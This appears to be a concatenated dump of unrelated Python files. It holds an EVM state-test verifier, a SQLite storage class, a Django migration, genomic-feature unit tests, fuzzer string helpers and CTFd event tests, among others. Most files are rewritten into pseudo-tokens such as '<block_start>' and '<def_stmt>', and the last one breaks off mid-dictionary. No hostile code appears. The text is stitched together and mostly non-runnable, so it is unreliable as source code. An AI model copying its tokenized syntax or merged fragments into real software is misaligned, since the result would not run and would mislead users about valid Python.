        qkc_config=qkc_env.quark_chain_config,
        # If testing QuarkChain states, should not use mock account
        use_mock_evm_account=not is_qkc_state,
    )

    # Optional per-test activation timestamps for precompiled contracts.
    if "overrides" in env:
        if "specialContractTimestamp" in env["overrides"]:
            for overrides in env["overrides"]["specialContractTimestamp"]:
                configure_special_contract_ts(
                    specials,
                    bytes.fromhex(overrides["address"]),
                    overrides["timestamp"],
                )

    seen_token_ids = set()
    # Fill up pre
    for address, h in list(pre.items()):
        # 40 hex chars, optionally 0x-prefixed (42).
        assert len(address) in (40, 42)
        address = decode_hex(remove_0x_head(address))
        state.set_nonce(address, parse_int_or_hex(h["nonce"]))
        if is_qkc_state and "balances" in h:
            # In QuarkChain state tests, can either specify balance map or single balance
            for token_id, balance in h["balances"].items():
                parsed_token_id = parse_int_or_hex(token_id)
                state.set_token_balance(
                    address, parsed_token_id, parse_int_or_hex(balance)
                )
                seen_token_ids.add(parsed_token_id)
        else:
            state.set_balance(address, parse_int_or_hex(h["balance"]))
        state.set_code(address, decode_hex(remove_0x_head(h["code"])))
        for k, v in h["storage"].items():
            state.set_storage_data(
                address,
                big_endian_to_int(decode_hex(k[2:])),
                big_endian_to_int(decode_hex(v[2:])),
            )

    # Update allowed token IDs
    if seen_token_ids:
        state.qkc_config._allowed_token_ids = seen_token_ids

    state.commit(allow_empties=True)
    return state


class EnvNotFoundException(Exception):
    # Raised by verify_state_test when a fixture lacks the "env" section.
    pass


def verify_state_test(test):
    """Run every post-state expectation of one fixture; raise on mismatch.

    Returns True when all tested fork configurations match their expected
    state root hashes.
    """
    print("Verifying state test")
    if "env" not in test:
        raise EnvNotFoundException("Env not found")
    _state = init_state(
        test["env"], test["pre"], test["qkcstate"], qkc_env=test["qkc"]
    )
    for config_name, results in test["post"].items():
        # Old protocol versions may not be supported
        if config_name not in network_to_test:
            continue
        print("Testing for %s" % config_name)
        for result in results:
            data = test["transaction"]["data"][result["indexes"]["data"]]
            if len(data) > 2000:
                # Abbreviate huge calldata in log output (byte count only).
                data = "data<%d>" % (len(data) // 2 - 1)
            print(
                "Checking for values: g %d v %d d %s (indexes g %d v %d d %d)"
                % (
                    parse_int_or_hex(
                        test["transaction"]["gasLimit"][result["indexes"]["gas"]]
                    ),
                    parse_int_or_hex(
                        test["transaction"]["value"][result["indexes"]["value"]]
                    ),
                    data,
                    result["indexes"]["gas"],
                    result["indexes"]["value"],
                    result["indexes"]["data"],
                )
            )
            computed = compute_state_test_unit(
                _state,
                test["transaction"],
                result["indexes"],
                evm_config,
                test["qkcstate"],
                qkc_env=test["qkc"],
            )
            # Compare only the 64 hex chars of the root (ignore 0x prefix).
            if computed["hash"][-64:] != result["hash"][-64:]:
                for k in computed["diff"]:
                    print(k, computed["diff"][k], file=sys.stderr)
                print(test["filename"], test["testname"], file=sys.stderr)
                raise Exception(
                    "Hash mismatch, computed: %s, supplied: %s"
                    % (computed["hash"], result["hash"])
                )
            else:
                for k in computed["diff"]:
                    print(k, computed["diff"][k])
                print("Hash matched!: %s" % computed["hash"])
    return True
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>numpy<as>np<import_stmt>sqlite3<import_stmt>sys<import_from_stmt>.base database<if_stmt>sys.version_info[0]<ge>3<block_start>unicode=str<block_end><class_stmt>PickalableSWIG<block_start><def_stmt>__setstate__ self state<block_start>self.__init__(*state['args'])<block_end><def_stmt>__getstate__ self<block_start><return>{'args':self.args}<block_end><block_end><class_stmt>PickalableSQL3Connect(sqlite3.Connection PickalableSWIG)<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.args=args<line_sep>sqlite3.Connection.__init__(self *args **kwargs)<block_end><block_end><class_stmt>PickalableSQL3Cursor(sqlite3.Cursor PickalableSWIG)<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.args=args<line_sep>sqlite3.Cursor.__init__(self *args **kwargs)<block_end><block_end><class_stmt>sql(database)<block_start>"""
This class saves the process in the working storage. It can be used if
safety matters.
"""<def_stmt>__init__ self *args **kwargs<block_start><import_stmt>os<line_sep># init base class
super(sql self).__init__(*args **kwargs)<line_sep># Create a open file, which needs to be closed after the sampling
<try_stmt><block_start>os.remove(self.dbname+'.db')<block_end><except_stmt><block_start><pass><block_end>self.db=PickalableSQL3Connect(self.dbname+'.db')<line_sep>self.db_cursor=PickalableSQL3Cursor(self.db)<line_sep># Create Table
# self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
# (like1 real, parx real, pary real, simulation1 real, chain int)''')
self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
('''+' real ,'.join(self.header)+''')''')<block_end><def_stmt>save self objectivefunction parameterlist simulations=<none> chains=1<block_start>coll=(self.dim_dict['like'](objectivefunction)+self.dim_dict['par'](parameterlist)+self.dim_dict['simulation'](simulations)+[chains])<line_sep># Apply rounding of floats
coll=map(self.db_precision coll)<line_sep>self.db_cursor.execute("INSERT INTO "+self.dbname+" VALUES ("+'"'+str('","'.join(map(str coll)))+'"'+")")<line_sep>self.db.commit()<block_end><def_stmt>finalize self<block_start>self.db.close()<block_end><def_stmt>getdata self<block_start>self.db=PickalableSQL3Connect(self.dbname+'.db')<line_sep>self.db_cursor=PickalableSQL3Cursor(self.db)<if_stmt>sys.version_info[0]<ge>3<block_start>headers=[(row[1] "<f8")<for>row self.db_cursor.execute("PRAGMA table_info("+self.dbname+");")]<block_end><else_stmt># Workaround for python2
<block_start>headers=[(unicode(row[1]).encode("ascii") unicode("<f8").encode("ascii"))<for>row self.db_cursor.execute("PRAGMA table_info("+self.dbname+");")]<block_end>back=np.array([row<for>row self.db_cursor.execute('SELECT * FROM '+self.dbname)] dtype=headers)<line_sep>self.db.close()<line_sep><return>back<block_end><block_end> |
# Generated by Django 2.0.9 on 2019-03-18 20:21
<import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>markupfield.fields<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[migrations.swappable_dependency(settings.AUTH_USER_MODEL)]<line_sep>operations=[migrations.CreateModel(name="Election" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("name" models.CharField(max_length=100)) ("date" models.DateField()) ("nominations_open_at" models.DateTimeField(blank=<true> null=<true>)) ("nominations_close_at" models.DateTimeField(blank=<true> null=<true>)) ("slug" models.SlugField(blank=<true> max_length=255 null=<true>)) ] options={"ordering":["-date"]} ) migrations.CreateModel(name="Nomination" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("name" models.CharField(max_length=1024 null=<true>)) ("email" models.CharField(max_length=1024 null=<true>)) ("previous_board_service" models.CharField(max_length=1024 null=<true>) ) ("employer" models.CharField(max_length=1024 null=<true>)) ("other_affiliations" models.CharField(blank=<true> max_length=2048 null=<true>) ) ("nomination_statement" markupfield.fields.MarkupField(null=<true> rendered_field=<true>) ) ("nomination_statement_markup_type" models.CharField(choices=[("" "--") ("html" "HTML") ("plain" "Plain") ("markdown" "Markdown") ("restructuredtext" "Restructured Text") ] default="markdown" editable=<false> max_length=30 ) ) ("_nomination_statement_rendered" models.TextField(editable=<false> null=<true>) ) ("accepted" models.BooleanField(default=<false>)) ("approved" models.BooleanField(default=<false>)) ("election" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to="nominations.Election" ) ) ("nominator" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="nominations_made" 
to=settings.AUTH_USER_MODEL ) ) ] ) migrations.CreateModel(name="Nominee" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("accepted" models.BooleanField(default=<false>)) ("approved" models.BooleanField(default=<false>)) ("slug" models.SlugField(blank=<true> max_length=255 null=<true>)) ("election" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="nominees" to="nominations.Election" ) ) ("user" models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="nominations_recieved" to=settings.AUTH_USER_MODEL ) ) ] ) migrations.AddField(model_name="nomination" name="nominee" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="nominations" to="nominations.Nominee" ) ) migrations.AlterUniqueTogether(name="nominee" unique_together={("user" "election")}) ]<block_end> |
# -*-coding:utf8-*-#
__author__='play4fun'<line_sep>"""
create time:15-11-8 ไธๅ4:44
็ปๅถ2D็ดๆนๅพ
"""<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('../data/home.jpg')<line_sep># cv2.imshow("src", img)
hsv=cv2.cvtColor(img cv2.COLOR_BGR2HSV)<line_sep>hist=cv2.calcHist([hsv] [0 1] <none> [180 256] [0 180 0 256])<line_sep>plt.imshow(hist interpolation='nearest')<line_sep>plt.show()<line_sep> |
<def_stmt>extractExpandablefemaleBlogspotCom item<block_start>'''
DISABLED
Parser for 'expandablefemale.blogspot.com'
'''<line_sep><return><none><block_end> |
<import_stmt>tqdm<import_stmt>torch<import_from_stmt>lav.lav_privileged LAV<import_from_stmt>lav.utils.datasets get_data_loader<import_from_stmt>lav.utils.logger Logger<def_stmt>main args<block_start>dmd=LAV(args)<line_sep>data_loader=get_data_loader('bev' args)<line_sep>logger=Logger('lav_bev' args)<line_sep>save_dir=logger.save_dir<line_sep>torch.manual_seed(args.seed)<line_sep># logger.watch_model(dmd.uniplanner)
global_it=0<for_stmt>epoch range(args.num_epoch)<block_start><for_stmt>data tqdm.tqdm(data_loader desc=f'Epoch {epoch}')<block_start>opt_info=dmd.train_bev(*data)<if_stmt>global_it%args.num_per_log<eq>0<block_start>logger.log_bev_info(global_it opt_info)<block_end>global_it<augadd>1<block_end>dmd.bev_scheduler.step()<if_stmt>(epoch+1)%args.num_per_save<eq>0<block_start>bev_path=f'{save_dir}/bev_{epoch+1}.th'<line_sep>torch.save(dmd.state_dict('bev') bev_path)<line_sep>print(f'save to {bev_path}')<line_sep>logger.save([bev_path])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--config-path' default='config.yaml')<line_sep>parser.add_argument('--device' default='cuda' choices=['cuda' 'cpu'])<line_sep># Training misc
parser.add_argument('--num-epoch' type=int default=160)<line_sep>parser.add_argument('--num-per-log' type=int default=100 help='log per iter')<line_sep>parser.add_argument('--num-per-save' type=int default=10 help='save per epoch')<line_sep>parser.add_argument('--batch-size' type=int default=512)<line_sep>parser.add_argument('--lr' type=float default=3e-4)<line_sep>parser.add_argument('--num-workers' type=int default=16)<line_sep># Reproducibility (still not fully determinstic due to CUDA/CuDNN)
parser.add_argument('--seed' type=int default=2021)<line_sep>args=parser.parse_args()<line_sep>main(args)<block_end> |
<import_stmt>os<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>selene_sdk.targets GenomicFeatures<import_from_stmt>selene_sdk.targets.genomic_features _any_positive_rows _is_positive_row _get_feature_data<class_stmt>TestGenomicFeatures(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.features=["CTCF" "eGFP-FOS" "GABP" "Pbx3" "Pol2" "TBP"]<line_sep>self.feature_index_map={"CTCF":0 "eGFP-FOS":1 "GABP":2 "Pbx3":3 "Pol2":4 "TBP":5}<line_sep>self.n_features=len(self.features)<line_sep># CTCF only, between 16110 and 16239
self.rows_example1=[["1" "16110" "16190" "CTCF"] # len 70
["1" "16128" "16158" "CTCF"] # len 30
["1" "16149" "16239" "CTCF"]]<line_sep># len 90
# CTCF only, between 91128 and 91358
self.rows_example2=[["2" "91128" "91358" "CTCF"] # len 200
["2" "91130" "91239" "CTCF"] # len 109
["2" "91156" "91310" "CTCF"]]<line_sep># len 154
# multiple features, between 8533 and 9049
self.rows_example3=[["chr3" "8533" "8817" "eGFP-FOS"] # len 284
["chr3" "8541" "8651" "GABP"] # len 110
["chr3" "8574" "8629" "Pol2"] # len 145
["chr3" "8619" "9049" "CTCF"] # len 430
["chr3" "8620" "8680" "TBP"] # len 60
["chr3" "8645" "8720" "TBP"]]<block_end># len 75
<def_stmt>get_feature_rows self chrom start end<block_start>"""This function disregards (`start`, `end`) input
"""<if_stmt>chrom<is><none><block_start><return><none><block_end><if_stmt>chrom<eq>"1"<block_start><return>self.rows_example1<block_end><elif_stmt>chrom<eq>"2"<block_start><return>self.rows_example2<block_end><elif_stmt>chrom<eq>"3"<block_start><return>self.rows_example3<block_end><else_stmt><block_start><return>[]<block_end><block_end>############################################
# Correctness tests for `_is_positive_row`
############################################
<def_stmt>test__is_positive_row_false self<block_start>query_start,query_end=(16150 16351)# len 201
feat_start,feat_end=(16110 16190)# len 80
threshold=0.50<line_sep>self.assertFalse(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end><def_stmt>test__is_positive_row_true_eq_threshold self<block_start>query_start,query_end=(16110 16309)# len 199
feat_start,feat_end=(16110 16190)# len 80
threshold=0.40<line_sep>self.assertTrue(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end><def_stmt>test__is_positive_row_true_gt_threshold self<block_start>query_start,query_end=(16110 16311)# len 201
feat_start,feat_end=(16110 16290)# len 170
threshold=0.80<line_sep>self.assertTrue(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end>############################################
# Correctness tests for `_any_positive_rows`
############################################
<def_stmt>test__any_positive_rows_none_rows self<block_start>rows=<none><line_sep>query_start,query_end=(10 100)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_empty_rows self<block_start>rows=[]<line_sep>query_start,query_end=(10 100)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_false self<block_start>rows=self.rows_example1<line_sep>query_start,query_end=(16150 16351)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_true self<block_start>rows=self.rows_example1<line_sep>query_start,query_end=(16150 16351)<line_sep>threshold={k:0.40<for>k self.features}<line_sep>self.assertTrue(_any_positive_rows(rows query_start query_end threshold))<block_end>############################################
# Correctness tests for `_get_feature_data`
############################################
<def_stmt>test__get_feature_data_none_rows self<block_start>query_chrom,query_start,query_end=(<none> 10 211)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_empty_rows self<block_start>query_chrom,query_start,query_end=("7" 10 211)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_single_feat_positive self<block_start>query_chrom,query_start,query_end=("1" 16100 16350)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[1 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_no_feat_positive self<block_start>query_chrom,query_start,query_end=("2" 91027 91228)<line_sep>threshold=np.array([0.51]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_multiple_feats_positive self<block_start>query_chrom,query_start,query_end=("3" 8619 
8719)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[1 1 0 0 0 1]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_different_thresholds self<block_start>query_chrom,query_start,query_end=("3" 8619 8719)<line_sep>threshold=np.array([0.50 0.0 0.0 0.0 0.0 1.0]).astype(np.float32)<line_sep>expected_encoding=[1 1 1 0 1 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end>############################################
# GenomicFeatures integration tests
############################################
<def_stmt>test_GenomicFeatures_single_threshold self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features 0.50)<line_sep>self.assertDictEqual(query_features.feature_thresholds {k:0.50<for>k self.features})<line_sep>self.assertSequenceEqual(query_features._feature_thresholds_vec.tolist() [0.50]<times>self.n_features)<block_end><def_stmt>test_GenomicFeatures_diff_thresholds self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features {"default":0.50 "CTCF":0.0 "Pol2":0.15})<line_sep>self.assertEqual(query_features.feature_thresholds {"CTCF":0.0 "eGFP-FOS":0.50 "GABP":0.50 "Pbx3":0.50 "Pol2":0.15 "TBP":0.50})<line_sep>np.testing.assert_almost_equal(query_features._feature_thresholds_vec.tolist() [0.0 0.50 0.50 0.50 0.15 0.50])<block_end><def_stmt>test_GenomicFeatures_lambda_thresholds self<block_start><def_stmt>_feature_thresholds f<block_start><if_stmt>f<eq>"Pbx3"<block_start><return>0.30<block_end><elif_stmt>f<eq>"CTCF"<block_start><return>0.40<block_end><else_stmt><block_start><return>0.50<block_end><block_end>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features _feature_thresholds)<line_sep>self.assertEqual(query_features.feature_thresholds {"CTCF":0.40 "eGFP-FOS":0.50 "GABP":0.50 "Pbx3":0.30 "Pol2":0.50 "TBP":0.50})<line_sep>np.testing.assert_almost_equal(query_features._feature_thresholds_vec.tolist() [0.40 0.50 0.50 0.30 0.50 0.50])<block_end><def_stmt>test_GenomicFeatures_no_thresholds__get_feature_data self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features 
feature_thresholds=<none>)<line_sep>expected_feature_data=np.zeros(self.n_features)<line_sep>expected_feature_data[self.feature_index_map['CTCF']]=1.<line_sep># NOTE: "1 16110 16390 CTCF" is the first line in the test data.
actual_feature_data=query_features.get_feature_data('1' 16110 16390)<line_sep>np.testing.assert_array_almost_equal(actual_feature_data expected_feature_data)<block_end><def_stmt>test_GenomicFeatures_0_5_threshold__get_feature_data self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features feature_thresholds=0.5)<line_sep># NOTE: "1 16110 16390 CTCF" is the first line in the test data.
# Overlap is less than a threshold:
np.testing.assert_array_almost_equal(query_features.get_feature_data('1' 16000 17000) np.zeros(self.n_features))<line_sep># Overlap is greater than a threshold:
expected_feature_data=np.zeros(self.n_features)<line_sep>expected_feature_data[self.feature_index_map['CTCF']]=1.<line_sep>np.testing.assert_array_almost_equal(query_features.get_feature_data('1' 16000 16500) expected_feature_data)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
<import_stmt>os<import_stmt>requests<import_from_stmt>. common<import_from_stmt>. tsdb<line_sep>session=requests.Session()<def_stmt>get_styles subreddit<block_start>(database subreddit)=tsdb.TSDB.for_subreddit(subreddit fix_name=<true>)<line_sep>print('Getting styles for /r/%s'%subreddit)<line_sep>subreddit=common.r.subreddit(subreddit)<line_sep>styles=subreddit.stylesheet()<line_sep>database.styles_dir.makedirs(exist_ok=<true>)<line_sep>stylesheet_filepath=database.styles_dir.with_child('stylesheet.css')<line_sep>print('Downloading %s'%stylesheet_filepath.relative_path)<with_stmt>stylesheet_filepath.open('w' encoding='utf-8')<as>stylesheet<block_start>stylesheet.write(styles.stylesheet)<block_end><for_stmt>image styles.images<block_start>image_basename=image['name']+'.'+image['url'].split('.')[-1]<line_sep>image_filepath=database.styles_dir.with_child(image_basename)<line_sep>print('Downloading %s'%image_filepath.relative_path)<with_stmt>image_filepath.open('wb')<as>image_file<block_start>response=session.get(image['url'])<line_sep>image_file.write(response.content)<block_end><block_end><block_end><def_stmt>get_styles_argparse args<block_start><return>get_styles(args.subreddit)<block_end> |
<import_from_stmt>django.test TestCase<import_from_stmt>corehq toggles<import_from_stmt>corehq.motech.dhis2.tasks send_datasets_for_all_domains<class_stmt>TestSendDatasetsForAllDomains(TestCase)<block_start>domain_name='does-not-exist'<def_stmt>setUp self<block_start>toggles.DHIS2_INTEGRATION.set(self.domain_name enabled=<true> namespace=toggles.NAMESPACE_DOMAIN)<block_end><def_stmt>tearDown self<block_start>toggles.DHIS2_INTEGRATION.set(self.domain_name enabled=<false> namespace=toggles.NAMESPACE_DOMAIN)<block_end><def_stmt>test_check_domain_exists self<block_start>"""
send_datasets_for_all_domains() should not raise an AttributeError
if a domain does not exist
"""<line_sep>send_datasets_for_all_domains()<block_end><block_end> |
# generated by datamodel-codegen:
# filename: test.json
# timestamp: 2019-07-26T00:00:00+00:00
<import_from_future_stmt> annotations<import_from_stmt>pydantic BaseModel Field<class_stmt>Second(BaseModel)<block_start>__root__:str<block_end><class_stmt>First(BaseModel)<block_start>__root__:Second<block_end><class_stmt>Model(BaseModel)<block_start>test_id:str=Field(<ellipsis> description='test ID')<line_sep>test_ip:First<block_end> |
"""Tests for web_utils."""<import_from_stmt>django.test SimpleTestCase<import_from_stmt>.. web_utils<class_stmt>TestCase(SimpleTestCase)<block_start>"""Test functions."""<def_stmt>test_size2integer self<block_start>self.assertEqual(web_utils.size2integer("1024") 1024)<line_sep># Convert to bytes
self.assertEqual(web_utils.size2integer("1K") 1024)<line_sep>self.assertEqual(web_utils.size2integer("1M") 1048576)<line_sep>self.assertEqual(web_utils.size2integer("1G") 1073741824)<line_sep># Convert to megabytes
self.assertEqual(web_utils.size2integer("1K" output_unit="MB") 0)<line_sep>self.assertEqual(web_utils.size2integer("1M" output_unit="MB") 1)<line_sep>self.assertEqual(web_utils.size2integer("1G" output_unit="MB") 1024)<line_sep># Unsupported unit
<with_stmt>self.assertRaises(ValueError)<block_start>web_utils.size2integer("1K" output_unit="GB")<block_end><block_end><block_end> |
# Copyright (c) 2020 - present <NAME> <https://github.com/VitorOriel>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
<import_from_stmt>.consts FUZZING_MARK<import_from_stmt>typing List Tuple Union<def_stmt>getIndexesToParse content:str searchFor:str=FUZZING_MARK<arrow>List[int]<block_start>"""Gets the indexes of the searched substring into a string content
@type content: str
@param content: The parameter content
@type searchFor: str
@param searchFor: The substring to be searched indexes on the given content
@returns List[int]: The positions indexes of the searched substring
"""<line_sep><return>[i<for>i,char enumerate(content)<if>char<eq>searchFor]<block_end><def_stmt>splitStrToList string:str separator:str=',' ignores:str='\\'<arrow>List[str]<block_start>"""Split the given string into a list, using a separator
@type string: str
@param string: The string to be splited
@type separator: str
@param separator: A separator to split the string
@type ignores: str
@param ignores: A string to ignores the separator
@returns List[str]: The splited string
"""<if_stmt>string<block_start><if_stmt>f'{ignores}{separator}'<in>string<block_start>final=[]<line_sep>buffer=''<for_stmt>substr string.split(separator)<block_start><if_stmt>substr[-1]<eq>ignores<block_start>buffer<augadd>substr[:-1]+separator<block_end><else_stmt><block_start>final.extend([buffer+substr])<line_sep>buffer=''<block_end><block_end><return>final<block_end><return>string.split(separator)<block_end><return>[]<block_end><def_stmt>stringfyList oneList:list<arrow>str<block_start>"""Stringfies a list
@type oneList: list
@param oneList: A list to be stringed
@returns str: The stringed list
"""<line_sep>output=''<for_stmt>i range(len(oneList)-1)<block_start>output<augadd>f"{oneList[i]},"<block_end>output<augadd>oneList[-1]<line_sep><return>output<block_end><def_stmt>getHumanLength length:int<arrow>Tuple[Union[int float] str]<block_start>"""Get the human readable length from the result
@type length: int
@param length: The length of the response body
@returns Tuple[int|float, str]: The tuple with new length and the readable order
"""<for_stmt>order ["B " "KB" "MB" "GB"]<block_start><if_stmt>length<l>1024<block_start><return>(length order)<block_end>length<augdiv>1024<block_end><return>(length "TB")<block_end><def_stmt>checkRangeList content:str<arrow>List[Union[int str]]<block_start>"""Checks if the given content has a range list,
and make a list of the range specified
@type content: str
@param content: The string content to check for range
@returns List[int|str]: The list with the compiled content
"""<def_stmt>getNumberRange left:str right:str<arrow>List[int]<block_start>"""Get the number range list
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[int]: The list with the range
"""<line_sep>isNumber=<true><line_sep>i=len(left)<while_stmt>isNumber<and>i<g>0<block_start><try_stmt><block_start>int(left[i-1])<block_end><except_stmt><block_start>isNumber=<false><block_end><else_stmt><block_start>i<augsub>1<block_end><block_end>leftDigit,leftStr=int(left[i:]) left[:i]<line_sep>isNumber=<true><line_sep>i=0<while_stmt>isNumber<and>i<l>(len(right)-1)<block_start><try_stmt><block_start>int(right[i+1])<block_end><except_stmt>Exception<as>e<block_start>isNumber=<false><block_end><else_stmt><block_start>i<augadd>1<block_end><block_end>rightDigit,rightStr=int(right[:(i+1)]) right[(i+1):]<line_sep>compiledList=[]<if_stmt>leftDigit<l>rightDigit<block_start><while_stmt>leftDigit<le>rightDigit<block_start>compiledList.append(f"{leftStr}{str(leftDigit)}{rightStr}")<line_sep>leftDigit<augadd>1<block_end><block_end><else_stmt><block_start><while_stmt>rightDigit<le>leftDigit<block_start>compiledList.append(f"{leftStr}{str(leftDigit)}{rightStr}")<line_sep>leftDigit<augsub>1<block_end><block_end><return>compiledList<block_end><def_stmt>getLetterRange left:str right:str<arrow>List[str]<block_start>"""Get the alphabet range list [a-z] [A-Z] [z-a] [Z-A]
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[str]: The list with the range
"""<line_sep>leftDigit,leftStr=left[-1] left[:-1]<line_sep>rightDigit,rightStr=right[0] right[1:]<line_sep>compiledList=[]<if_stmt>ord(leftDigit)<le>ord(rightDigit)<block_start>orderLeftDigit=ord(leftDigit)<line_sep>orderRightDigit=ord(rightDigit)<while_stmt>orderLeftDigit<le>orderRightDigit<block_start>compiledList.append(f"{leftStr}{chr(orderLeftDigit)}{rightStr}")<line_sep>orderLeftDigit<augadd>1<block_end><block_end><else_stmt><block_start>orderLeftDigit=ord(leftDigit)<line_sep>orderRightDigit=ord(rightDigit)<while_stmt>orderLeftDigit<ge>orderRightDigit<block_start>compiledList.append(f"{leftStr}{chr(orderLeftDigit)}{rightStr}")<line_sep>orderLeftDigit<augsub>1<block_end><block_end><return>compiledList<block_end><if_stmt>'\-'<in>content<block_start>content=content.replace('\-' '-')<block_end><elif_stmt>'-'<in>content<block_start>left,right=content.split('-' 1)<try_stmt># Checks if the left and right digits from the mark are integers
<block_start>int(left[-1])<line_sep>int(right[0])<line_sep><return>getNumberRange(left right)<block_end><except_stmt><block_start><return>getLetterRange(left right)<block_end><block_end><return>[content]<block_end> |
<import_from_stmt>collections defaultdict<import_from_stmt>queue Queue<import_from_stmt>unittest.mock patch<import_from_stmt>redis.exceptions ConnectionError<import_from_stmt>CTFd.config TestingConfig<import_from_stmt>CTFd.utils.events EventManager RedisEventManager ServerSentEvent<import_from_stmt>tests.helpers create_ctfd destroy_ctfd login_as_user register_user<def_stmt>test_event_manager_installed <block_start>"""Test that EventManager is installed on the Flask app"""<line_sep>app=create_ctfd()<assert_stmt>type(app.events_manager)<eq>EventManager<line_sep>destroy_ctfd(app)<block_end><def_stmt>test_event_manager_subscription <block_start>"""Test that EventManager subscribing works"""<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" 